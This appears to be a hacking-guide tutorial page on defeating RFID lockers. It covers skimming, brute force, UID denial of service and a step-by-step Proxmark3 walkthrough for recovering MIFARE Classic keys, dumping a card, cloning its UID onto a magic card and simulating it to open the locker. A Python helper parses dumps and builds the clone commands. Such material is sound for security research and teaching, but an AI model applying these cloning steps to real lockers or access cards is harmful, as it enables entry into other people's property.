# Locker RFID

{% hint style="info" %}
[More information about RFID on the dedicated "Technology" page.](/hacking-guide/technology-1/researched-technologies/untitled.md)
{% endhint %}

### Attack scenarios  <a href="#docs-internal-guid-3ff257f3-7fff-da25-d793-8eaf5bb546b7" id="docs-internal-guid-3ff257f3-7fff-da25-d793-8eaf5bb546b7"></a>

* Brute-force the RFID UID
* Card cloning
* Card read and simulation
* Write sector 0 of the card (DoS)

### Real-life scenarios  <a href="#docs-internal-guid-6a79a191-7fff-0996-04ca-bf7b26f938f4" id="docs-internal-guid-6a79a191-7fff-0996-04ca-bf7b26f938f4"></a>

**Card skimming**: place a rogue reader next to or on top of the existing locker reader to capture the UID of every card presented, then use that UID for a **card cloning or card simulation attack**.

**Brute-force attack**: try many UIDs against one locker. Because the locker only reads a card after its button is pressed, every attempt costs a physical button press, so searching a 4-byte UID space this way is not realistic.

**DoS attack**: rewrite sector 0 on a user's RFID card so the locker no longer recognises it. Block 0 of sector 0 (UID, BCC, SAK and ATQA) is read-only on a genuine MIFARE Classic card, so the UID can only be overwritten on cards whose block 0 is writable, such as UID-changeable "magic" cards.

### Steps

Steps for a card cloning/simulation attack.

1. Use card 1 to lock the locker.
2. Scan card 1 with an RFID reader to get the UID.
3. Write the UID of card 1 to card 2 (a UID-changeable card).
4. Use card 2 to open the locker, or simulate the UID of card 1 with the Proxmark3 to open the locker.

#### Proxmark3 Easy steps

Steps for a card cloning/simulation attack using a Proxmark3.

1. Use card 1 to lock the locker.
2. Scan card 1 with the Proxmark using the command **hf search** to get the UID and the card type.

   ![](/files/-Lv5sELXuYlMi_lHAGRe)
3. Check the default keys of the MIFARE Classic card using the command **hf mf chk \*1 ?** (`*1` = all sectors of a 1K card, `?` = try both key A and key B, using the client's built-in list of default keys). Steps 3 to 6 are only needed for a full clone; to simulate only the UID, skip to step 8.

   <img src="/files/-Lv5tFZkX5DSJ7Wj7S5W" alt="" data-size="original">
4. Recover the keys of every sector with the nested attack, starting from the known key, and save them to dumpkeys.bin using the command **hf mf nested 1 0 A ffffffffffff d** (1K card, known key A of block 0 is ffffffffffff, `d` writes the keys to dumpkeys.bin).

   <img src="/files/-Lv5ugg5TUwLj7dcjIDi" alt="" data-size="original">
5. Dump the card contents with the command **hf mf dump** (it uses the keys from dumpkeys.bin).

   <img src="/files/-Lv5vqBmEiONO3gK-to8" alt="" data-size="original">
6. Take card 2 (a UID-changeable card) and set its UID to that of card 1 with the command **hf mf csetuid 795f17ad**.

   <img src="/files/-Lv5wMQyV0f7sbL1mrF6" alt="" data-size="original">
7. Use card 2 to open the locker.

   <img src="/files/-Lv5w_sLcs485bertY9k" alt="" data-size="original">
8. Simulate card 1 using the command **hf 14a sim t 1 u 795f17ad** (type 1 = MIFARE Classic, with the UID of card 1).

   <img src="/files/-Lv5wv9KHk6_NTKBng4E" alt="" data-size="original">
9. Hold the Proxmark against the reader to open the locker.
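The cloning steps above come down to copying the 4-byte UID in block 0 of card 1 and, for a full clone, the keys in each sector trailer. The Python below is an added example, not code from this page or from the Proxmark project: it builds a constructed MIFARE Classic 1K dump in the layout `hf mf dump` saves (64 blocks of 16 bytes), parses block 0 and the sector trailers the way a cloner would, verifies the BCC so a card whose block 0 was rewritten inconsistently (the sector 0 DoS case) is caught, and fills the two Proxmark commands from the steps with the dumped UID. The dump contents, the default key `ffffffffffff` and the access bits `ff078069` are assumptions standing in for the real card.

```python
# Added example: not from this page or the Proxmark project. Parses a MIFARE
# Classic 1K dump (64 blocks x 16 bytes, the layout `hf mf dump` saves) and
# builds the block-0 bytes that `hf mf csetuid` writes to a UID-changeable card.
# The dump below is constructed in code, not captured from the locker card.

BLOCK_SIZE = 16
BLOCKS_1K = 64
SECTORS_1K = 16
DEFAULT_KEY = bytes.fromhex("ffffffffffff")
# Transport-configuration access bits (ff 07 80 69): every block readable and
# writable with Key A, the factory setting on blank Classic 1K cards (assumed here).
DEFAULT_ACCESS = bytes.fromhex("ff078069")


def bcc(uid: bytes) -> int:
    """ISO 14443-3 block check character: XOR of the 4 bytes of a single-size UID."""
    if len(uid) != 4:
        raise ValueError("single-size UID must be 4 bytes")
    x = 0
    for b in uid:
        x ^= b
    return x


def build_block0(uid: bytes, sak: int = 0x08, atqa: bytes = b"\x04\x00",
                 manufacturer: bytes = bytes(8)) -> bytes:
    """Manufacturer block: UID(4) | BCC(1) | SAK(1) | ATQA(2) | vendor data(8).
    SAK 0x08 and ATQA 04 00 are what a Classic 1K reports during anticollision."""
    block = uid + bytes([bcc(uid), sak]) + atqa + manufacturer
    if len(block) != BLOCK_SIZE:
        raise ValueError("block 0 must be 16 bytes")
    return block


def block0_consistent(block0: bytes) -> bool:
    """True when the stored BCC matches the UID. A block 0 rewritten with a wrong
    BCC (the sector-0 DoS on a UID-changeable card) fails this check."""
    return block0[4] == bcc(block0[:4])


def build_sample_dump(uid: bytes) -> bytes:
    """Constructed 1K dump: block 0 from the UID, default keys and access bits in
    every sector trailer (block 3 of each sector), zeroed data blocks."""
    blocks = []
    for n in range(BLOCKS_1K):
        if n == 0:
            blocks.append(build_block0(uid))
        elif n % 4 == 3:  # sector trailer: Key A | access bits | Key B
            blocks.append(DEFAULT_KEY + DEFAULT_ACCESS + DEFAULT_KEY)
        else:
            blocks.append(bytes(BLOCK_SIZE))
    return b"".join(blocks)


def parse_dump(dump: bytes) -> dict:
    """Pull out what the cloning steps need: UID, SAK, ATQA and per-sector keys."""
    if len(dump) != BLOCKS_1K * BLOCK_SIZE:
        raise ValueError(f"expected {BLOCKS_1K * BLOCK_SIZE} bytes, got {len(dump)}")
    b0 = dump[:BLOCK_SIZE]
    if not block0_consistent(b0):
        raise ValueError(f"block 0 BCC {b0[4]:02x} does not match UID {b0[:4].hex()}")
    sectors = []
    for s in range(SECTORS_1K):
        start = (s * 4 + 3) * BLOCK_SIZE
        trailer = dump[start:start + BLOCK_SIZE]
        sectors.append({"key_a": trailer[:6].hex(),
                        "access": trailer[6:10].hex(),
                        "key_b": trailer[10:].hex()})
    return {
        "uid": b0[:4].hex(),
        "sak": b0[5],
        "atqa": b0[6:8].hex(),
        # Default keys everywhere means `hf mf chk` alone recovers the whole card.
        "default_keys_only": all(sec["key_a"] == DEFAULT_KEY.hex()
                                 and sec["key_b"] == DEFAULT_KEY.hex()
                                 for sec in sectors),
        "sectors": sectors,
    }


def proxmark_commands(uid_hex: str) -> dict:
    """The two Proxmark commands from the steps above, filled with the dumped UID."""
    return {"csetuid": f"hf mf csetuid {uid_hex}",
            "sim": f"hf 14a sim t 1 u {uid_hex}"}


if __name__ == "__main__":
    dump = build_sample_dump(bytes.fromhex("795f17ad"))  # UID used on this page
    info = parse_dump(dump)
    print(f"UID {info['uid']}  SAK {info['sak']:02x}  ATQA {info['atqa']}  "
          f"default keys only: {info['default_keys_only']}")
    print(proxmark_commands(info["uid"]))
```

Run it on a real `hf mf dump` output by replacing `build_sample_dump(...)` with the bytes of the dump file; `default_keys_only` tells you whether step 4 (the nested attack) was needed at all, and a `ValueError` from `parse_dump` on a user's card is the signature of a rewritten, inconsistent block 0.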

### DEMO

{% embed url="https://drive.google.com/file/d/1ARkWg0eN_rc2suxeIY9FSc--V38q1PVN/view" %}

#### Tools used

* Proxmark3, handy for reading and writing card data and for simulating RFID tags
  * Software and firmware from the [proxmark3 GitHub](https://github.com/Proxmark/proxmark3)
* RFID card 1: MIFARE Classic 1K (M1 S50), 13.56 MHz
* RFID card 2: UID-changeable 13.56 MHz card (clone card)

